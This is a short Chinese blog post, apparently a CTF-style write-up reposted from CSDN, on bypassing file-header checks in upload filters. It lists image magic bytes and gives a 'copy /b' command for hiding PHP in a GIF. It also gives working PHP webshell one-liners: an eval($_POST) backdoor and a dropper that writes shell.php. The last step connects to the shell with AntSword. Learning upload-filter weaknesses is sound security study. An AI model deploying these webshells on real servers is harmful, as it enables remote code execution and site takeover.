我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!
一、文件头检测突破上传
1、文件头检测绕过:修改文件头/制作图片一句话
(1)修改文件头: JPEG (jpg),文件头:FFD8FF PNG (png),文件头:89504E47 GIF (gif),文件头:47494638 TIFF (tif),文件头:49492A00 Windows Bitmap (bmp),文件头:424D
(2)制作图片一句话:copy 1.gif/b+moon.php shell.php 1.gif是正常的图片 其中moon.php的内容:
<?php phpinfo();?>
<?php eval($_POST[123]);phpinfo();?>
<?php echo 'success!!!';fputs(fopen('shell.php','w'),'<?php phpinfo();eval(\$_POST[123]);?>');?>
2、解题过程:
(1)上传php探针,提示这不是一张图,猜测是文件头检测 (2)上传图片马
(3)蚁剑连接:
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/119452599